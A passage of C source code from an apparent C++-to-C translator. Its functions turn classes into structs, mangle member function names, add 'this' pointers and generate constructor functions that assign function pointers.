argLetters;\n\n\tif(className == NULL || functionName == NULL || args == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\tcarg = 0;\n\trecord = 1;\n\tnumberOfArgs = nstrchr(args, ',') + 1;\n\n\n\t/*\n\t essentially, this creates the length of the new name, which will be:\n\t the original name, preceeded by the class name, followed by the first letter\n\t of all the parameters.\n\t */\n\tfinalLength = strlen(functionName) + strlen(className) + numberOfArgs;\n\n\tfinalName = malloc(sizeof(char) * finalLength + 1);\n\tif(finalName == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\targLetters = malloc(sizeof(char) * numberOfArgs + 1);\n\tif(argLetters == NULL)\n\t{\n\t\tfree(finalName);\n\t\treturn NULL;\n\t}\n\n\tfor(i = 0; i < strlen(args); i++) /* loop through the function name */\n\t{\n\t\tif(record == 1 && isalpha(args[i])) /* if we are currently seeking an argument first letter, and it is indeed a letter */\n\t\t{\n\t\t\targLetters[carg] = args[i]; /* get the argument */\n\t\t\tcarg++;\n\t\t\trecord = 0;\n\t\t}\n\t\telse if(args[i] == ',') /* else, if we are starting a new argument */\n\t\t{\n\t\t\trecord = 1;\n\t\t\tcontinue;\n\t\t}\n\t}\n\targLetters[carg] = '\\0'; /* ensure a null terminator after last argument. */\n\n\n\t/* this creates the final name out of the three parts. */\n\tstrcpy(finalName, className);\n\tstrcat(finalName, functionName);\n\tstrcat(finalName, argLetters);\n\n\t/* strcpy'd, so who cares about this now. */\n\tfree(argLetters);\n\n\treturn finalName;\n}\n\nint replaceClass(Vector* tokens)\n{\n\tint i;\n\tint numReplaced;\n\n\tif(tokens == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tnumReplaced = 0;\n\n\tfor(i = 0; i < tokens->length-1; i++) /* loop through the lines (tokens) of the program */\n\t{\n\t\t/* if we have found a token 'class' */\n\t\tif(strcmp((char*)tokens->contents[i], \"class\") == 0)\n\t\t{\n\t\t\tfree(tokens->contents[i]);\n\t\t\ttokens->contents[i] = malloc(sizeof(char) * 7);\n\t\t\tstrcpy((char*)tokens->contents[i], \"struct\");\n\t\t\tnumReplaced ++;\n\t\t}\n\t}\n\n\treturn numReplaced;\n}\n\nint addSelfReferences(Vector* tokens)\n{\n\tint i;\n\tint bracketCounter;\n\n\tchar* className;\n\n\tif(tokens == NULL)\n\t{\n\t\treturn -1;\n\t}\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\t/* this means we have found a class who's members need 'this' support added to them. */\n\t\tif(isClass(tokens, i))\n\t\t{\n\t\t\tint j;\n\t\t\tint cStart;\n\t\t\tint cStop;\n\t\t\tint foundBracket;\n\t\t\tcStart = i;\n\n\t\t\tbracketCounter = 0;\n\n\t\t\tclassName = tokens->contents[i];\n\n\t\t\tfoundBracket = 0;\n\n\t\t\tfor(j = i; j < tokens->length; j++)\n\t\t\t{\n\t\t\t\tif(strcmp(tokens->contents[j], \"{\") == 0)\n\t\t\t\t{\n\t\t\t\t\tfoundBracket = 1;\n\t\t\t\t\tbracketCounter ++;\n\t\t\t\t}\n\t\t\t\t/* if we find a closing brace */\n\t\t\t\telse if(strcmp(tokens->contents[j], \"}\") == 0)\n\t\t\t\t{\n\t\t\t\t\tbracketCounter --;\n\t\t\t\t\tif(foundBracket == 1 && bracketCounter == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tcStop = j;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\t/* operates on each class individually, distributing the self pointer */\n\t\t\tdistributeThis(tokens, className, cStart, cStop);\n\t\t}\n\t}\n\treturn 0;\n}\n\nint distributeThis(Vector* tokens, char* className, int classStart, int classStop)\n{\n\tint i;\n\tint bracketLevel;\n\tVector* classVariables;\n\n\tbracketLevel = 0;\n\tclassVariables = makeVector(7);\n\n\t/* collect class variables first */\n\tfor(i = classStart; i < classStop; i++)\n\t{\n\t\tif(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t{\n\t\t\tbracketLevel ++;\n\t\t}\n\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t{\n\t\t\tbracketLevel --;\n\t\t}\n\n\t\tif(isFunction(tokens, i))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\tif(bracketLevel == 1 && isVariable(tokens,i))\n\t\t{\n\t\t\tappendString(classVariables, tokens->contents[i], strlen(tokens->contents[i]));\n\t\t}\n\t}\n\n\t/* now modify the member functions that reference the class variables. */\n\tfor(i = classStart; i < classStop; i++)\n\t{\n\t\t/* this is a member function if we enter this block */\n\t\tif(isFunction(tokens, i))\n\t\t{\n\t\t\tint j;\n\t\t\tint fStart;\n\t\t\tint fStop;\n\t\t\tint bStart;\n\t\t\tint foundBracket;\n\t\t\tint bracketCounter;\n\n\t\t\tVector* functionArgs;\n\n\t\t\tfStart = i;\n\t\t\tbracketCounter = 0;\n\t\t\tfoundBracket = 0;\n\n\t\t\t/* loop through the tokens from this point and store the function starts and stops */\n\t\t\tfor(j = i; j < classStop; j++)\n\t\t\t{\n\t\t\t\tif(strcmp(tokens->contents[j], \"{\") == 0)\n\t\t\t\t{\n\t\t\t\t\tif(foundBracket == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tbStart = j;\n\t\t\t\t\t\tfoundBracket = 1;\n\t\t\t\t\t}\n\t\t\t\t\tbracketCounter ++;\n\t\t\t\t}\n\t\t\t\telse if(strcmp(tokens->contents[j], \"}\") == 0)\n\t\t\t\t{\n\t\t\t\t\tbracketCounter --;\n\t\t\t\t\tif(foundBracket == 1 && bracketCounter == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tfStop = j;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\n\t\t\tfunctionArgs = getParams(tokens, fStart);\n\n\t\t\t/* this goes through the function body and replaces the class variables with this-> */\n\t\t\taddThisRef(tokens, classVariables, functionArgs, bStart, fStop);\n\n\t\t\t/* adds class <cname> * this to the function's arguments. */\n\t\t\tclassStop += addThisArg(tokens, className, fStart, bStart);\n\t\t\t\n\t\t\t\n\t\t\tdestroyVector(functionArgs);\n\t\t}\n\t}\n\n\tdestroyVector(classVariables);\n\treturn 0;\n}\n\nVector* getParams(Vector* tokens, int funcStart)\n{\n\tint i;\n\n\tVector* argNames;\n\n\targNames = makeVector(3);\n\n\t/* loops through the strings starting at the bracket after the class name. */\n\tfor(i = funcStart + 1; i < tokens->length; i++)\n\t{\n\t\t/* if we found the end of the args */\n\t\tif(strcmp(tokens->contents[i], \")\") == 0)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tif(isValidName(tokens->contents[i]))\n\t\t{\n\t\t\t/* we found a variable!! */\n\t\t\tappendString(argNames, tokens->contents[i], strlen(tokens->contents[i]));\n\t\t}\n\t}\n\n\treturn argNames;\n}\n\nint addThisArg(Vector* tokens, char* className, int fStart, int bStart)\n{\n\tint i;\n\tint j;\n\tint argEnd;\n\tchar* space;\n\tchar* comma;\n\tchar* classWord;\n\tchar* cnameToken;\n\tchar* pointerToken;\n\tchar* thisToken;\n\n\tif(className == NULL || tokens == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tfor(i = bStart; i >= 0; i--)\n\t{\n\t\tif(strcmp(tokens->contents[i], \")\") == 0)\n\t\t{\n\t\t\targEnd = i;\n\t\t\tbreak;\n\t\t}\n\t}\n\n\t/* allocs the various variables that will be used to create a \"this\" pointer */\n\tspace = malloc(sizeof(char) * 2);\n\tcomma = malloc(sizeof(char) * 3);\n\tclassWord = malloc(sizeof(char) * 7);\n\tcnameToken = malloc(sizeof(char) * strlen(className) + 2);\n\tpointerToken = malloc(sizeof(char) * 5);\n\tthisToken = malloc(sizeof(char) * 6);\n\n\t/* adds the various terms to their strings */\n\tstrcpy(space, \" \");\n\tstrcpy(comma, \", \");\n\tstrcpy(classWord, \"class\");\n\tstrcpy(cnameToken, className);\n\tstrcpy(pointerToken, \" * \");\n\tstrcpy(thisToken, \"this \");\n\t\n\t/* inserts the tokens into the vector */\n\tinsert(tokens, thisToken, argEnd);\n\tinsert(tokens, pointerToken, argEnd);\n\tinsert(tokens, cnameToken, argEnd);\n\tinsert(tokens, space, argEnd);\n\tinsert(tokens, classWord, argEnd);\n\n\t/* if we have an arguement other than ours */\n\tfor(j = argEnd - 1; j >= 0; j--)\n\t{\n\t\t/* if we find an open bracket before another argument term */\n\t\tif(strcmp(tokens->contents[j], \"(\") == 0)\n\t\t{\n\t\t\t/* we dont need a comma */\n\t\t\tfree(comma);\n\t\t\treturn 5;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[j])[0]))\n\t\t{\n\t\t\t/* we need to insert a comma to separate the arguments */\n\t\t\tinsert(tokens, comma, j + 1);\n\t\t\treturn 6;\n\t\t}\n\t}\n\n\treturn 0;\n}\n\nint addThisRef(Vector* tokens, Vector* classVariables, Vector* params, int fstart, int fstop)\n{\n\tint i;\n\tint numAdded;\n\n\tVector* localVars;\n\n\tlocalVars = makeVector(3);\n\tnumAdded = 0;\n\n\t/* loop through the tokens that represent this class function */\n\tfor(i = fstart; i < fstop; i++)\n\t{\n\t\tint j;\n\t\t/* this whole block here checks for local vars, so as to stop them being \"this'd\" */\n\t\tif(i - 1 >= 0)\n\t\t{\n\t\t\tif(isVariable(tokens, i))\n\t\t\t{\n\t\t\t\tappendString(localVars, tokens->contents[i], strlen(tokens->contents[i]));\n\t\t\t}\n\t\t}\n\t\t/* loop through the class variables we have found. */\n\t\tfor(j = 0; j < classVariables->length; j++)\n\t\t{\n\t\t\t/* if the token we are on matches a classVariable we are on */\n\t\t\tif(strcmp(tokens->contents[i], classVariables->contents[j]) == 0)\n\t\t\t{\n\t\t\t\tint k;\n\t\t\t\tint taken;\n\n\t\t\t\ttaken = 0;\n\t\t\t\t/* check if the token is found in the parameters for the function */\n\t\t\t\tfor(k = 0; k < params->length; k++)\n\t\t\t\t{\n\t\t\t\t\tif(strcmp(tokens->contents[i], params->contents[k]) == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\ttaken = 1;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* check if this token is represented in the local vars... */\n\t\t\t\tfor(k = 0; k < localVars->length; k++)\n\t\t\t\t{\n\t\t\t\t\tif(strcmp(tokens->contents[i], localVars->contents[k]) == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\ttaken = 1;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* if this flag is set, we know we have run into a local var or a param. */\n\t\t\t\tif(taken == 1)\n\t\t\t\t{\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\telse if(isValidType(tokens->contents[i - 1]) == 0 && isValidName(tokens->contents[i - 1]) == 0)\n\t\t\t\t{\n\t\t\t\t\tchar* vname;\n\t\t\t\t\tvname = malloc(sizeof(char) * strlen(tokens->contents[i]) + 7);\n\t\t\t\t\tvname[0] = '\\0';\n\n\t\t\t\t\t/* prefix the name with this-> */\n\t\t\t\t\tstrcpy(vname, \"this->\");\n\t\t\t\t\tstrcat(vname, tokens->contents[i]);\n\n\t\t\t\t\tfree(tokens->contents[i]);\n\t\t\t\t\ttokens->contents[i] = vname;\n\t\t\t\t\tnumAdded ++;\n\n\t\t\t\t\t/* breaks out of the loop searching the classVariables */\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tdestroyVector(localVars);\n\treturn numAdded;\n}\n\nint mangleAllMembers(Vector* tokens)\n{\n\tint i;\n\tint inClass;\n\tint bracketCounter;\n\tchar* className;\n\n\tVector* classFunctions;\n\n\t/* loop through all tokens in the program */\n\tinClass = 0;\n\tbracketCounter = 0;\n\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\tif(isClass(tokens, i))\n\t\t{\n\t\t\tclassFunctions = makeVector(4);\n\n\t\t\tclassName = tokens->contents[i];\n\t\t\tinClass = 1;\n\t\t}\n\t\tif(inClass == 1)\n\t\t{\n\t\t\tif(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t\t{\n\t\t\t\tbracketCounter ++;\n\t\t\t}\n\t\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t\t{\n\t\t\t\tbracketCounter --;\n\n\t\t\t\t/* we have broken out of a class */\n\t\t\t\tif(bracketCounter == 0)\n\t\t\t\t{\n\t\t\t\t\tinClass = 0;\n\t\t\t\t\tdestroyVector(classFunctions);\n\t\t\t\t}\n\t\t\t}\n\t\t\telse if(isFunction(tokens, i))\n\t\t\t{\n\t\t\t\tint j;\n\t\t\t\tchar* fname;\n\t\t\t\tchar* args;\n\n\t\t\t\tchar* finalName;\n\t\t\t\t\n\t\t\t\tappendString(classFunctions, tokens->contents[i], strlen(tokens->contents[i]));\n\t\t\t\t\n\t\t\t\tfname = tokens->contents[i];\n\t\t\t\targs = malloc(sizeof(char)*512);\n\t\t\t\tif(args == NULL)\n\t\t\t\t{\n\t\t\t\t\treturn -1;\n\t\t\t\t}\n\t\t\t\targs[0] = '\\0';\n\t\t\t\tj = i+2;\n\t\t\t\t/* loop until we encounter a closing brace */\n\t\t\t\twhile(strcmp(tokens->contents[j], \")\") != 0)\n\t\t\t\t{\n\t\t\t\t\t/* this will only occur if there is a syntax error present in the file. (i.e. open bracket with no corresponding closed) */\n\t\t\t\t\tif(j >= tokens->length)\n\t\t\t\t\t{\n\t\t\t\t\t\treturn -1;\n\t\t\t\t\t}\n\t\t\t\t\t/* we don't want to include the opening bracket... */\n\t\t\t\t\tif(strcmp(tokens->contents[j], \"(\") != 0)\n\t\t\t\t\t{\n\t\t\t\t\t\t/* this adds on another part of the parameters, and then as pace to delimit them. */\n\t\t\t\t\t\tstrcat(args, (char*)tokens->contents[j]);\n\t\t\t\t\t\tstrcat(args, \" \");\n\t\t\t\t\t}\n\t\t\t\t\tj++;\n\t\t\t\t}\n\t\t\t\tfinalName = mangle(className, fname, args);\n\t\t\t\ttokens->contents[i] = finalName;\n\t\t\t\tfree(fname);\n\t\t\t\tfree(args);\n\t\t\t}\n\t\t\telse if(isFunctionCall(tokens, i))\n\t\t\t{\n\t\t\t\tint j;\n\t\t\t\tint needsMangling;\n\t\t\t\tneedsMangling = 0;\n\n\t\t\t\tfor(j = 0; j < classFunctions->length; j++)\n\t\t\t\t{\n\t\t\t\t\tif(strcmp(tokens->contents[i], classFunctions->contents[j]) == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tneedsMangling = 1;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* this actually mangles function calls. */\n\t\t\t\tif(needsMangling)\n\t\t\t\t{\n\t\t\t\t\tint hasArgs;\n\t\t\t\t\tchar* finalName;\n\t\t\t\t\tchar* thisPointer;\n\n\t\t\t\t\tfinalName = malloc(sizeof(char)*256);\n\t\t\t\t\tfinalName[0] = '\\0';\n\t\t\t\t\thasArgs = 0;\n\n\t\t\t\t\tstrcat(finalName, className);\n\t\t\t\t\tstrcat(finalName, tokens->contents[i]);\n\n\t\t\t\t\t/* loop through the following tokens, looking for the closing brace of the function */\n\t\t\t\t\tfor(j = i + 1; j < tokens->length; j++)\n\t\t\t\t\t{\n\t\t\t\t\t\tchar temp[2];\n\t\t\t\t\t\ttemp[1] = '\\0';\n\t\t\t\t\t\tif(strcmp(tokens->contents[j], \")\") == 0)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tchar* thisParam;\n\n\t\t\t\t\t\t\tthisParam = malloc(sizeof(char) * 5);\n\t\t\t\t\t\t\tstrcpy(thisParam, \"this\");\n\t\t\t\t\t\t\tinsert(tokens, thisParam, j);\n\n\t\t\t\t\t\t\tif(hasArgs == 1)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tchar* comma;\n\t\t\t\t\t\t\t\tcomma = malloc(sizeof(char) * 2);\n\t\t\t\t\t\t\t\tstrcpy(comma, \",\");\n\t\t\t\t\t\t\t\tinsert(tokens, comma, j);\t\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t\t/* this means if tokens->contents is not present in \"(,\" */\n\t\t\t\t\t\telse if(strstr(\"(,\",tokens->contents[j]) == NULL)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\thasArgs = 1;\n\t\t\t\t\t\t\ttemp[0] = getTypeID(tokens, j);\n\t\t\t\t\t\t\tstrcat(finalName, temp);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tfree(tokens->contents[i]);\n\t\t\t\t\ttokens->contents[i] = finalName;\n\n\t\t\t\t\t/* insert a this pointer behind the function call */\n\t\t\t\t\tthisPointer = malloc(sizeof(char)*7);\n\t\t\t\t\tstrcpy(thisPointer, \"this->\");\n\n\t\t\t\t\tinsert(tokens, thisPointer, i);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn 0;\n}\n\nvoid migrateFunctions(Vector* tokens)\n{\n\tint i;\n\tint inClass;\n\tint bracketCounter;\n\tint foundBracket;\n\tint insertPos;\n\tVector* allFunctionTokens;\n\n\tinClass = 0;\n\tbracketCounter = 0;\n\tfoundBracket = 0;\n\tinsertPos = 0;\n\n\tallFunctionTokens = makeVector(50);\n\n\t/* loop, looking for classes */\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\tif(strcmp(tokens->contents[i], \"class\") == 0)\n\t\t{\n\t\t\tint j;\n\t\t\tfor(j = i + 1; j < tokens->length; j++)\n\t\t\t{\n\t\t\t\tif(isClass(tokens, j))\n\t\t\t\t{\n\t\t\t\t\tinClass = 1;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\t/* basically, if there is anything other than a space before our class declaration, we are NOT in a class */\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]))\n\t\t\t\t{\n\t\t\t\t\tinClass = 0;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t/* if we are currently in a class, we need to record opening and closing brackets */\n\t\tif(inClass == 1)\n\t\t{\n\t\t\tif(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t\t{\n\t\t\t\tif(foundBracket == 0)\n\t\t\t\t{\n\t\t\t\t\tfoundBracket = 1;\n\t\t\t\t}\n\t\t\t\tbracketCounter++;\n\t\t\t}\n\t\t\t/* encountered a closed bracket, may be an end-of-class */\n\t\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t\t{\n\t\t\t\tbracketCounter --;\n\n\t\t\t\tif(foundBracket == 1 && bracketCounter == 0)\n\t\t\t\t{\n\t\t\t\t\tinClass = 0;\n\t\t\t\t\tfoundBracket = 0;\n\t\t\t\t}\n\t\t\t}\n\t\t\t/* we need to find the previous semicolon. */\n\t\t\telse if(beginsFunction(tokens, i))\n\t\t\t{\n\t\t\t\tint bFuncCounter;\n\t\t\t\tint foundBFunc;\n\t\t\t\tint offset;\n\t\t\t\tint j;\n\n\t\t\t\tVector* fptrTokens;\n\n\t\t\t\t/* this will be inserted into the program */\n\t\t\t\tfptrTokens = makeVector(10);\n\n\t\t\t\tbFuncCounter = 0;\n\t\t\t\tfoundBFunc = 0;\n\n\t\t\t\t/* loop until we run out of space, or we find an open block brace */\n\t\t\t\tfor(j = i; j < tokens->length && strcmp(tokens->contents[j], \"{\") != 0; j++)\n\t\t\t\t{\n\t\t\t\t\tif(isFunction(tokens, j))\n\t\t\t\t\t{\n\t\t\t\t\t\tappendString(fptrTokens, \"(*\", 3);\n\t\t\t\t\t}\n\t\t\t\t\tappendString(fptrTokens, (char*)tokens->contents[j], strlen((char*) tokens->contents[j]));\n\t\t\t\t\tif(isFunction(tokens, j))\n\t\t\t\t\t{\n\t\t\t\t\t\tappendString(fptrTokens, \")\", 2);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tappendString(fptrTokens, \";\\n\", 3);\n\n\t\t\t\t/* loops through the positions. */\n\t\t\t\tdo\n\t\t\t\t{\n\t\t\t\t\tif(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tfoundBFunc = 1;\n\t\t\t\t\t\tbFuncCounter ++;\n\t\t\t\t\t}\n\t\t\t\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tbFuncCounter --;\n\t\t\t\t\t\tif(foundBFunc == 1 && bFuncCounter == 0)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tappend(allFunctionTokens, removeAt(tokens, i));\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tappend(allFunctionTokens, removeAt(tokens, i));\n\n\t\t\t\t}while(bFuncCounter != 0 || foundBFunc == 0);\n\t\t\t\tappendString(allFunctionTokens, \"\\n\", 2);\n\n\t\t\t\toffset = fptrTokens->length;\n\n\t\t\t\t/* inserts the new function Pointer tokens into their proper location */\n\t\t\t\t/*\n\t\t\t\tfor(j = fptrTokens->length - 1; j >= 0; j--)\n\t\t\t\t{\n\t\t\t\t\tinsert(tokens, removeAt(fptrTokens, j), i);\n\t\t\t\t}\n\t\t\t\t*/\n\t\t\t\twhile(fptrTokens->length > 0)\n\t\t\t\t{\n\t\t\t\t\tif(fptrTokens->contents[fptrTokens->length - 1] != NULL)\n\t\t\t\t\t{\n\t\t\t\t\t\tinsert(tokens, removeAt(fptrTokens, fptrTokens->length - 1), i);\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tdestroyVector(fptrTokens);\n\t\t\t\tfptrTokens = NULL;\n\n\t\t\t\ti += offset - 1;\n\t\t\t}\n\t\t}\n\t}\n\n\tfor(i = 0; i < tokens->length; i ++)\n\t{\n\t\t/* if we have found main */\n\t\tif(isFunction(tokens, i) && strcmp(tokens->contents[i], \"main\") == 0)\n\t\t{\n\t\t\tint j;\n\t\t\t/* loop until we find \"int\", as this would be the starting function declaration */\n\t\t\tfor(j = i - 1; j >= 0; j--)\n\t\t\t{\n\t\t\t\tif(beginsFunction(tokens, j))\n\t\t\t\t{\n\t\t\t\t\tinsertPos = j;\n\t\t\t\t\tbreak;\n\t\t\t\t}\t\n\t\t\t}\n\t\t\t/* backtrack then insert functions above main */\n\t\t\tif(insertPos != 0)\n\t\t\t{\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\t\n\tappendString(allFunctionTokens, \"\\n\", 2);\n\t/* inserts the final tokens into the vector. */\n\tfor(i = allFunctionTokens->length - 1; i >= 0; i--)\n\t{\n\t\tinsert(tokens, removeAt(allFunctionTokens, i), insertPos);\n\t}\n\tdestroyVector(allFunctionTokens);\n\n\treturn;\n}\n\nint createAllConstructors(Vector* tokens)\n{\n\tint i;\n\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\tchar* classConstructor;\n\t\tif(isClass(tokens, i))\n\t\t{\n\t\t\tint insertPos;\n\t\t\tint j;\n\t\t\tclassConstructor = makeConstructor(tokens, i);\n\n\t\t\tinsertPos = -1;\n\n\t\t\t/* loop to find main */\n\t\t\tfor(j = i; j < tokens->length; j++)\n\t\t\t{\n\t\t\t\tif(beginsFunction(tokens, j))\n\t\t\t\t{\n\t\t\t\t\tint k;\n\t\t\t\t\t/* loop to find if the function we just found IS main... */\n\t\t\t\t\tfor(k = j; k < tokens->length; k++)\n\t\t\t\t\t{\n\t\t\t\t\t\tif(isFunction(tokens, k))\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tif(strcmp(tokens->contents[k], \"main\") == 0)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tinsertPos = j;\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tif(insertPos != -1)\n\t\t\t\t{\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tinsert(tokens, classConstructor, insertPos);\n\t\t}\n\t}\n\n\treturn 0;\n}\n\nchar* makeConstructor(Vector* tokens, int pos)\n{\n\tint i;\n\tint foundBracket;\n\tint bracketCounter;\n\tchar* constructor;\n\n\tfoundBracket = 0;\n\tbracketCounter = 0;\n\n\tconstructor = malloc(sizeof(char)*1024);\n\tif(constructor == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\tconstructor[0] = '\\0';\n\n\tstrcat(constructor, \"void construct\");\n\tstrcat(constructor, tokens->contents[pos]);\n\tstrcat(constructor, \"(struct \");\n\tstrcat(constructor, tokens->contents[pos]);\n\tstrcat(constructor, \"* this)\\n{\\n\");\n\n\t/* loop through the class, grabbing the function pointers */\n\tfor(i = pos; i < tokens->length; i++)\n\t{\n\t\tif(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t{\n\t\t\tfoundBracket = 1;\n\t\t\tbracketCounter ++;\n\t\t}\n\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t{\n\t\t\tbracketCounter --;\n\n\t\t\t/* we have broken out of a class */\n\t\t\tif(bracketCounter == 0 && foundBracket == 1)\n\t\t\t{\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\telse if(isVariable(tokens, i))\n\t\t{\n\t\t\tint j;\n\t\t\tint addInit;\n\t\t\tchar varInit[512];\n\n\t\t\tvarInit[0] = '\\0';\n\t\t\tstrcpy(varInit, \"\\tthis->\");\n\t\t\taddInit = 0;\n\n\t\t\tfor(j = i; j < tokens->length && strcmp(tokens->contents[j], \";\") != 0; j++)\n\t\t\t{\n\t\t\t\tstrcat(varInit, tokens->contents[j]);\n\t\t\t}\n\n\t\t\tstrcat(varInit, \";\\n\");\n\t\t\t\n\t\t\tfor(j = 0; j < strlen(varInit); j++)\n\t\t\t{\n\t\t\t\tif(varInit[j] == '=')\n\t\t\t\t{\n\t\t\t\t\taddInit = 1;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif(addInit == 1)\n\t\t\t{\n\t\t\t\tj = i + 1;\n\t\t\t\twhile(strcmp((char*)tokens->contents[j], \";\") != 0)\n\t\t\t\t{\n\t\t\t\t\tfree(removeAt(tokens, j));\n\t\t\t\t}\n\t\t\t\tstrcat(constructor, varInit);\n\t\t\t}\n\t\t}\n\t\telse if(isFunctionPointer(tokens, i))\n\t\t{\n\t\t\t/* if we have found a function pointer, add it to the constructor */\n\t\t\tstrcat(constructor, \"\\tthis->\");\n\t\t\tstrcat(constructor, (char*) tokens->contents[i]);\n\t\t\tstrcat(constructor, \" = &\");\n\t\t\tstrcat(constructor, (char*) tokens->contents[i]);\n\t\t\tstrcat(constructor, \";\\n\");\n\t\t}\n\t}\n\n\tstrcat(constructor, \"}\\n\");\n\n\treturn constructor;\n}\n\nint placeConstructors(Vector* tokens)\n{\n\tint i;\n\tint inClass;\n\tint bracketCounter;\n\n\tinClass = 0;\n\tbracketCounter = 0;\n\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\tif(isClass(tokens, i))\n\t\t{\n\t\t\tinClass = 1;\n\t\t}\n\t\telse if(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t{\n\t\t\tbracketCounter ++;\n\t\t}\n\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t{\n\t\t\tbracketCounter --;\n\t\t\tif(bracketCounter == 0)\n\t\t\t{\n\t\t\t\tinClass = 0;\n\t\t\t}\n\t\t}\n\n\t\t/* this will capture only non-member functions */\n\t\tif(isFunction(tokens, i) && inClass == 0)\n\t\t{\n\t\t\tint j;\n\t\t\tint bracketLevel;\n\n\t\t\tbracketLevel = 0;\n\n\t\t\tfor(j = i + 1; j < tokens->length; j++)\n\t\t\t{\n\t\t\t\tif(strcmp(tokens->contents[j], \"{\") == 0)\n\t\t\t\t{\n\t\t\t\t\tbracketLevel ++;\n\t\t\t\t}\n\t\t\t\telse if(strcmp(tokens->contents[j], \"}\") == 0)\n\t\t\t\t{\n\t\t\t\t\tbracketLevel --;\n\t\t\t\t\tif(bracketLevel == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tbreak;\t\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\telse if(isClassVariable(tokens, j))\n\t\t\t\t{\n\t\t\t\t\tint k;\n\t\t\t\t\tchar* varType;\n\t\t\t\t\tchar* constructorCall;\n\n\t\t\t\t\tvarType = getType(tokens, j);\n\t\t\t\t\tconstructorCall = malloc(sizeof(char) * 512);\n\n\t\t\t\t\tstrcpy(constructorCall, \"\\nconstruct\");\n\t\t\t\t\tstrcat(constructorCall, varType);\n\t\t\t\t\tstrcat(constructorCall, \"(&\");\n\t\t\t\t\tstrcat(constructorCall, tokens->contents[j]);\n\t\t\t\t\tstrcat(constructorCall, \");\\n\");\n\n\t\t\t\t\t/* find a semicolon. */\n\t\t\t\t\tfor(k = j + 1; k < tokens->length; k++)\n\t\t\t\t\t{\n\t\t\t\t\t\tif(strcmp(tokens->contents[k], \";\") == 0)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tinsert(tokens, constructorCall, k + 1);\n\n\t\t\t\t\tfree(varType);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn 0;\n}\n\nint fixOuterFunctions(Vector* tokens)\n{\n\tint i;\n\tint inClass;\n\tint bracketCounter;\n\tint inOuterFunc;\n\n\tinClass = 0;\n\tbracketCounter = 0;\n\tinOuterFunc = 